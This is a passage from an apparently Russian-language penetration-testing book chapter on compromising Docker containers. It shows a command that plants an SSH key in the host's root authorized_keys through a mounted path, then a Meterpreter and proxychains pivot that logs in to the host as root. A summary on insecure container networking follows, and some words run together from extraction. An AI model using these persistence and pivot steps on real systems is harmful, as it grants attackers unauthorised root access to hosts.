2VzLCAiV2hhdCB0aGUgaGVsbCBpcyB3YXRlcj8gIg== sensible@ansible" >> /host/root/.ssh/authorized_keys

Из подконтрольного нам контейнера можем выполнитьповоротс помощью сеанса Meterpreter, войти в сеть контейнера и пройти аутентификацию в SSHслужбе 172.18.0.1, которая, как мы ранее подозревали, основываясь на результатах сканирования nmap, принадлежит хосту.

root@kali:~# proxychains ssh root@172.18.0.1 -i ~/.ssh/id_rsa ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-172.18.0.1:22-<><>-OK

Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-128-generic x86_64)

root@vulndocker:~# id

uid=0(root) gid=0(root) groups=0(root)

Резюме

Уконтейнеров есть множество преимуществ, поэтому они – важная тема. Docker произвел настоящую революцию в плане обработки образов кон-

тейнеров и их развертывания. Будучи авторами вредоносных программ, мы должны рассматриватьвсе новыетехнологии с позиции хакера.Как можно это взломать и как использовать, чтобы получить доступ, которого у нас не было раньше?

Если бизнес переходитс виртуальных машин на контейнеры в надежде снизить затраты,предполагая,что они обеспечивают одинаковую защиту,компанияподвергаетсяперекрестныматакам,которыепреждебылитрудноосущест­ вимыми, если не невозможными.

В этой главе мы увидели, что компрометация простой CMS, использующей контейнеры, привела к доступу к другому контейнеру, что в итоге полностью скомпрометировало хост. Это не означает, что следует избегать Docker и его контейнеров, но, как и любое иное программное обеспечение, Docker нужно надежно настроить перед развертыванием. Уязвимый или неправильно настроенный контейнер позволит злоумышленникам перейти к другим, более важным приложениям или,что еще хуже, к хосту.

Мы также рассмотрели опасности развертывания приложений с использованием небезопасных контейнерных сетей. Нам удалось скомпрометировать приложение, и, оказавшись внутри, мы успешно развернулись по сети Docker, получив доступ к другим контейнерам и в конечном итоге скомпрометировав сам хост.